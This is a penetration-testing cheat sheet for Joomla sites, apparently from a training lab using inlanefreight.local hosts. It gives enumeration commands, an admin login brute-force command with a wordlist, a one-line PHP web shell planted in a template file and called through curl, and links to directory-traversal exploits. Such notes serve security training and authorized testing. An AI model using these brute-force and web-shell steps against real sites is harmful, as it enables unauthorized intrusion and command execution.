Joomla
Introduction
CMS used for discussion forums, photo galleries, e-Commerce, user-based communities, and more.
Written in PHP and uses MySQL in the backend.
Joomla Discovery/Footprinting
droopescan scan joomla --url http://dev.inlanefreight.local
Enumeration via droopescan
python2.7 joomlascan.py -u http://dev.inlanefreight.local
Enumeration via joomlascan.py
curl -s http://dev.inlanefreight.local/ | grep Joomla
Check Webpage Source
curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -
Some Joomla versions may be fingerprinted from this file
Browse to http://dev.inlanefreight.local/plugins/system/cache/cache.xml
The cache.xml
file can give out an approximate version
of Joomla
Browse to http://dev.inlanefreight.local/media/system/js/
Some versions of Joomla can be fingerprinted by analyzing the javascript files in this folder
Browse to http://blog.inlanefreight.local/robots.txt
Check for references to Joomla
Browse to http://dev.inlanefreight.local/README.txt
Check the README file to look for references to Joomla
Joomla Users and Login Bruteforcing
Administrator account: The default administrator account is admin, but the password is set at install time
You can perform login broteforce by using the following: https://github.com/ajnik/joomla-bruteforce
PoC:
sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
Joomla Known Vulnerabilities
PHP TEMPLATE CODE INJECTION TO RCE [Requires Admin Account]
The basic idea is to add PHP code inside a template
Login as Admin β Navigate to Configuration β Select a Template β Select an existing PHP file β add the following payload:
system($_GET['cmd']);
curl -s http://dev.inlanefreight.local/templates/protostar/error.php?cmd=id
Joomla 3.9.4 directory traversal CVE-2019-10945
Exploit 1: https://www.exploit-db.com/exploits/46710
Exploit 2: https://github.com/dpgg101/CVE-2019-10945
Last updated